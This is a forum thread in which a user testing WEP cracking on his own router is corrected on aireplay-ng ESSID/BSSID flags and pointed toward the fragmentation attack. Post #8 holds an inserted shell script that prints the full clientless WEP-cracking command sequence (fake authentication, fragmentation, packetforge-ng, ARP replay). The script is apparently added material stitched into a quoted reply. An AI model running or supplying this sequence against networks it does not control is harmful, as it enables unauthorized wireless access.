Thread: Help with aireplay -ng (Packet Injection)

  1. #1
    Just burned his ISO
    Join Date
    Jan 2008
    Posts
    12

    Help with aireplay -ng (Packet Injection)

    I'm following the instructions from abitaz's blog (awesome so far!). I'm running a linksys router - I set the encryption down to WEP. I've got a second laptop downloading all kinds of stuff and generating lots of traffic.

    I've got airodump-ng monitoring the channel (and it's working correctly). Now, I'm trying to use aireplay-ng to inject packets (I don't understand this very well yet).

    The command abitaz suggests using is: aireplay-ng -3 -e 07B402920894 rausb0

    -3 Is the kind of attack (but I'm not sure what kind of attack that is) and -e (according to the help file) lets me specify the SSID of the target AP.

    So, the BSSID of my target AP is 00:0F:66:00:6A:1D. (As displayed by airodump-ng, however aireplay asks me to enter it without the colons)

    So, when I enter the command, I see the following happen:

    bt ~ # aireplay-ng -3 -e 000F66006A1D rausb0
    No source MAC (-h) specified. Using the device MAC (00:0E:3B:09:C2:A1)
    22:35:14 Waiting for beacon frame (ESSID: 000F66006A1D) on channel 6
    22:35:24 No such BSSID available.
    Please specify a BSSID (-a).
    bt ~ #


    However, this is what I see in airodump:
    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    00:0F:66:00:6A:1D  101 100    18836    41088   10   6  48  WEP  WEP         Anarchia

    There are tons of beacons! So, I'm lost. Help? Thanks

  2. #2


    Hi. -e is for the ESSID, or the name of the network, not the BSSID, which is the MAC address of the AP

  3. #3
    Just burned his ISO
    Join Date
    Jan 2008
    Posts
    12


    Quote Originally Posted by abitaz
    Hi. -e is for the ESSID, or the name of the network, not the BSSID, which is the MAC address of the AP
    Ah-HAH! That was my mistake. In your blog, your target AP's ESSID is also its BSSID. I got confused with the terminology. Thanks!

    Quote Originally Posted by abitaz
    BTW, the main point of injection is if there isn't lots of traffic, or even no traffic at all. If you are trying to test it, try without generating any traffic. That's the cool thing about aireplay injection.
    Gotcha. I will try that tonight.

    Quote Originally Posted by spankdidly
    Man, use the fragmentation attack. It works every time for me. I don't care about clients or lack of clients or anything on my AP. I just hose it down with fragmentation!
    Awesome. As soon as I'm done learning about this type of attack (No idea what it's even called) I'll try out a fragmentation attack (hopefully tonight!) Thanks!

  4. #4
    Developer balding_parrot
    Join Date
    May 2007
    Posts
    3,399


    Quote Originally Posted by F4RR4R
    Ah-HAH! That was my mistake. In your blog, your target AP's ESSID is also its BSSID. I got confused with the terminology. Thanks!

    Gotcha. I will try that tonight.

    Awesome. As soon as I'm done learning about this type of attack (No idea what it's even called) I'll try out a fragmentation attack (hopefully tonight!) Thanks!
    Edit your posts, do not make three posts in a row in two minutes.

  5. #5


    Quote Originally Posted by F4RR4R
    Ah-HAH! That was my mistake. In your blog, your target AP's ESSID is also its BSSID. I got confused with the terminology. Thanks!

    Actually, it's not its BSSID, although the ESSID name sounds almost like a BSSID. A BSSID will always be represented with colons, xx:xx:xx:xx:xx:xx, and will have 12 digits.

    No, this attack is for routers with no clients. It requires a few more settings, but it's great.
    If so, I'll play with it a bit and if I'm successful, I will post a step-by-step on my blog. Thanks.

  6. #6


    BTW, the main point of injection is if there isn't lots of traffic, or even no traffic at all. If you are trying to test it, try without generating any traffic. That's the cool thing about aireplay injection.

    Quote Originally Posted by F4RR4R
    I've got a second laptop downloading all kinds of stuff and generating lots of traffic.

  7. #7
    Junior Member thegreo
    Join Date
    Jan 2008
    Posts
    61


    When running aireplay, try the following:

    aireplay-ng -3 -b BSSID-OF-AP -h YOUR_DEVICE_MAC rausb0

    So the attack is -3.
    -b is the BSSID of your AP (typed in like a MAC ADDRESS! NOT the broadcast name, i.e. LINKSYS (the ESSID)).

    -h is your DEVICE MAC! (not sure if you are spoofing it or not)

    So the command would look like:

    aireplay-ng -3 -b 1f:2f:3f:4f:5f:6f -h 00:11:22:33:44:55 rausb0

    ---------------------------------------------------------------

    I assume you are associated with the Access Point before you try this command.......... (as you said, so far so good)
    If you are not, or unsure what I mean, please don't side track from your original question... thanks
    Give credit & show appreciation for members' creations,

  8. #8


    As I mentioned on my blog, to keep the commands at the simplest level, in most cases you can leave out the -h parameter, and it will use your MAC address by default. You also have a choice of using one of either the BSSID or the ESSID.

    Quote Originally Posted by thegreo
    When running aireplay, try the following:

    aireplay-ng -3 -b BSSID-OF-AP -h YOUR_DEVICE_MAC rausb0

    So the attack is -3.
    -b is the BSSID of your AP (typed in like a MAC ADDRESS! NOT the broadcast name, i.e. LINKSYS (the ESSID)).

    -h is your DEVICE MAC! (not sure if you are spoofing it or not)

    So the command would look like:

    aireplay-ng -3 -b 1f:2f:3f:4f:5f:6f -h 00:11:22:33:44:55 rausb0

    ---------------------------------------------------------------

    I assume you are associated with the Access Point before you try this command.......... (as you said, so far so good)
    If you are not, or unsure what I mean, please don't side track from your original question... thanks
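    The two things this thread turns on are (a) whether the target string you hand aireplay-ng is an ESSID (-e) or a BSSID (-b for -3, -a for -1), and (b) the clientless route that spankdidly and abitaz call "the fragmentation attack". The following is an added example, not code from the thread, from abitaz's blog or from the aircrack-ng project: a small POSIX shell script that checks the identifier format before building the ARP-replay command (so a bare 12-hex-digit MAC is never silently sent to -e, which is exactly what produced "No such BSSID available" in the first post), and that lays out the fake-auth / -5 / packetforge-ng / -2 sequence for an AP with no clients. It only prints commands and never transmits. The interface (rausb0), BSSID, device MAC and ESSID in the demo are the values from the first post; the aireplay-ng and packetforge-ng flags are the standard ones, and the fragment-*.xor name is a placeholder for the keystream file -5 writes.

```shell
#!/bin/sh
# Added example, not code from the thread or from aircrack-ng: decide whether a
# target string is a BSSID (-b) or an ESSID (-e) before building the aireplay-ng
# command, and print the clientless fragmentation sequence. Nothing here
# transmits; the functions only print the commands they would run.

# True if $1 is a BSSID in the form aireplay-ng expects: six colon-separated
# hex octets, e.g. 00:0F:66:00:6A:1D (case-insensitive).
is_bssid() {
    printf '%s\n' "$1" | grep -Eiq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

# True if $1 is twelve bare hex digits, i.e. a MAC with the colons stripped.
# Passed to -e, aireplay-ng waits for an ESSID literally named like that.
is_bare_mac() {
    printf '%s\n' "$1" | grep -Eiq '^[0-9a-f]{12}$'
}

# Print the ARP-replay (-3) command for a target given as BSSID or ESSID.
#   $1 target (BSSID or ESSID)   $2 monitor-mode interface   $3 optional source MAC
# -h is added only when a source MAC is given; otherwise aireplay-ng falls back
# to the interface's own MAC, which is fine if that is the MAC you associated with.
arp_replay_cmd() {
    target=$1; iface=$2; srcmac=${3:-}
    if is_bssid "$target"; then
        sel="-b $target"
    else
        if is_bare_mac "$target"; then
            echo "warning: '$target' looks like a BSSID without colons; treating it as an ESSID" >&2
        fi
        sel="-e '$target'"   # quoted so an ESSID with spaces pastes correctly
    fi
    if [ -n "$srcmac" ]; then
        is_bssid "$srcmac" || { echo "error: source MAC must be xx:xx:xx:xx:xx:xx, got '$srcmac'" >&2; return 1; }
        printf 'aireplay-ng -3 %s -h %s %s\n' "$sel" "$srcmac" "$iface"
    else
        printf 'aireplay-ng -3 %s %s\n' "$sel" "$iface"
    fi
}

# Print the clientless sequence: fake-authenticate with -1, recover a PRGA
# keystream with the fragmentation attack (-5), forge an ARP request from it
# with packetforge-ng, then replay that frame with -2.
#   $1 BSSID   $2 source MAC   $3 interface   $4 optional ESSID for -1
# Both MACs are validated up front because every step takes them.
# fragment-*.xor stands for the .xor file that -5 writes; substitute the real name.
clientless_plan() {
    bssid=$1; srcmac=$2; iface=$3; essid=${4:-}
    is_bssid "$bssid" && is_bssid "$srcmac" || {
        echo "error: BSSID and source MAC must be xx:xx:xx:xx:xx:xx" >&2; return 1; }
    [ -n "$essid" ] && essid_opt="-e '$essid' " || essid_opt=""
    printf 'aireplay-ng -1 0 %s-a %s -h %s %s\n' "$essid_opt" "$bssid" "$srcmac" "$iface"
    printf 'aireplay-ng -5 -b %s -h %s %s\n' "$bssid" "$srcmac" "$iface"
    printf 'packetforge-ng -0 -a %s -h %s -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-request\n' "$bssid" "$srcmac"
    printf 'aireplay-ng -2 -r arp-request %s\n' "$iface"
}

# Dry run with the values from the first post:  sh aireplay-plan.sh demo
if [ "${1:-}" = "demo" ]; then
    arp_replay_cmd 00:0F:66:00:6A:1D rausb0
    arp_replay_cmd 000F66006A1D rausb0            # warns: this is the first post's mistake
    arp_replay_cmd Anarchia rausb0 00:0E:3B:09:C2:A1
    clientless_plan 00:0F:66:00:6A:1D 00:0E:3B:09:C2:A1 rausb0 Anarchia
fi
```

    Run it with `demo` to see the four-step clientless plan next to the two correct forms of the -3 command. The source MAC check also catches the seven-octet typo that is easy to make when pasting a MAC by hand; aireplay-ng itself will only tell you the address is invalid after you have already brought the interface up.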

  9. #9
    Junior Member thegreo
    Join Date
    Jan 2008
    Posts
    61


    I didn't mean to tread on your toes with my post, fella.

    I perfectly agree with you, and to be honest there is no right or wrong way; if it works, you have succeeded. But I do agree with you about keeping things simple, short & sweet; it will speed up your process and make learning easier.

    Sorry again, fella

  10. #10
    Senior Member imported_spankdidly
    Join Date
    Feb 2006
    Posts
    1,031


    Man, use the fragmentation attack. It works every time for me. I don't care about clients or lack of clients or anything on my AP. I just hose it down with fragmentation!
    I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!
